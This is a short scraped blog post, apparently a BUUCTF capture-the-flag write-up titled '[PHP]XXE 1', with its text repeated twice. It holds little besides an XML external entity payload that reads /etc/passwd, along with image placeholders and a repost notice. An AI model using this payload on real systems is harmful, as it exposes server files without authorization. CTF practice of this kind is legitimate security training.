<?xml version=”1.0″ encoding=”utf-8″?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM “file:///etc/passwd” >]>
<root>
<name>&xxe;</name>
</root>
payload
![web*buuctf*[PHP]XXE 1](https://blog.ytso.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
![web*buuctf*[PHP]XXE 1](https://blog.ytso.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
原创文章,作者:254126420,如若转载,请注明出处:https://blog.ytso.com/tech/pnotes/273241.html
<?xml version=”1.0″ encoding=”utf-8″?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM “file:///etc/passwd” >]>
<root>
<name>&xxe;</name>
</root>
payload
![web*buuctf*[PHP]XXE 1](https://blog.ytso.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
![web*buuctf*[PHP]XXE 1](https://blog.ytso.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
原创文章,作者:254126420,如若转载,请注明出处:https://blog.ytso.com/tech/pnotes/273241.html